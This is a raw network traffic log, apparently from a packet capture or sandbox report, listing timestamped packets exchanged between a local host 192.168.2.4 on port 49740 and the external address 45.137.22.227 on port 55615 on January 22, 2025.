Jan 22, 2025 14:12:13.338073015 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.338099003 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.338099957 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.338124990 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.338126898 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.338149071 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.338188887 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.338207960 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.338215113 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.338242054 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.338280916 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.338311911 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.343242884 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.343298912 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.343332052 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.343343973 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.343359947 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.343369961 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.343403101 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.343415976 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.343444109 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.343580008 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.343606949 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.384768009 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.384893894 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.432761908 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.432848930 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.440519094 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.440712929 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.445754051 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.445813894 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.445822001 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.445888996 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.445902109 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.445960999 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446006060 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446022034 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446042061 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446055889 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446086884 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446110010 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446166992 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446176052 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446244955 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446285009 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446311951 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446366072 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446391106 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446424961 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446441889 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446470022 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446516991 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446573973 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446583986 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446600914 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446626902 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446666002 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446677923 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446679115 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446705103 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446732044 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446738005 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446757078 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446758032 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446784019 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446794987 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446810007 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446824074 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446835995 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446861982 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446866035 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446887970 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446898937 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446913958 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446924925 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446939945 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.446969986 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.446999073 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.451847076 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.451909065 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452008009 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452039003 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452071905 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452090025 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452142000 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452195883 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452202082 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452255011 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452306032 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452359915 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452405930 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452454090 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452461004 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452519894 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452533007 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452594995 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452621937 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452640057 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452686071 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452748060 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452759981 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452805996 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452853918 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452861071 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452913046 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.452918053 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.452980995 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453018904 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453038931 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453047991 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453068018 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453099966 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453154087 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453213930 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453275919 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453346014 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453397989 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453412056 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453465939 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453504086 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453531981 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453591108 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453598022 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453624964 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453692913 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453722000 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453773022 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453799009 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453824997 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453830957 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453850985 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453855038 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453877926 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453886032 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453903913 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453921080 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453929901 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453943014 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453957081 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453963995 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.453983068 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.453993082 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454009056 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454009056 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454035044 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454037905 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454058886 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454081059 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454082012 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454108953 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454140902 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454168081 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454194069 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454202890 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454220057 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454246044 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454248905 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454272032 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454283953 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454298019 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454304934 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454324007 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454349041 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454350948 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454371929 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454376936 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454401970 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454413891 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454428911 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454454899 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454476118 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454479933 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454507113 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454511881 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454534054 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.454547882 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454576969 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.454605103 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.457954884 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.458015919 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.459332943 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.459399939 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.459467888 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.459593058 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.459657907 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.459728956 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.459755898 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.459814072 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.459816933 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.459867954 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.459934950 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.459961891 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.459996939 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460062981 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460086107 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460138083 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460195065 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460196972 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460262060 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460270882 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460422039 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460423946 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460485935 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460556030 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460608006 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460617065 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460634947 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460689068 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460773945 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460808992 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460850000 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460855007 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.460870981 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460901022 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.460906029 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461026907 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461038113 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461054087 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461076975 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461107969 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461111069 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461180925 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461184025 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461210012 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461241007 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461268902 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461306095 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461354017 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461363077 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461380005 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461416006 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461437941 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461564064 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461622000 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461687088 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461700916 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461764097 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461817980 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461858034 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461914062 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461940050 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461966991 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.461966991 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461990118 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.461993933 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462025881 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462042093 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462060928 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462080956 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462089062 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462107897 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462133884 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462158918 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462161064 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462188005 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462197065 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462213993 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462215900 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462240934 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462243080 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462266922 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462266922 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462295055 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462296963 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462318897 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462322950 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462347984 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462348938 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462374926 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462376118 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462402105 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462408066 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462416887 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462428093 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462450981 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462454081 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462476969 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462480068 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462507010 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462507010 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462528944 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462534904 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462553024 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462560892 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462587118 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462588072 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462614059 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462627888 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462635040 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462639093 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462660074 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462665081 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462686062 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462691069 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462709904 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462723017 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462758064 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462760925 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462779999 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462788105 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462810993 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462815046 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462835073 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462863922 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462867022 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462892056 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462918997 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462946892 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462954044 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.462971926 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.462995052 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463011026 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463021994 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463043928 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463048935 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463072062 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463076115 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463102102 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463102102 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463119030 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463129044 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463155031 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463165045 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463181019 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463181973 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463197947 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463207006 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463232994 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463233948 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463258982 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463262081 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463282108 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463285923 CET	55615	49740	45.137.22.227	192.168.2.4
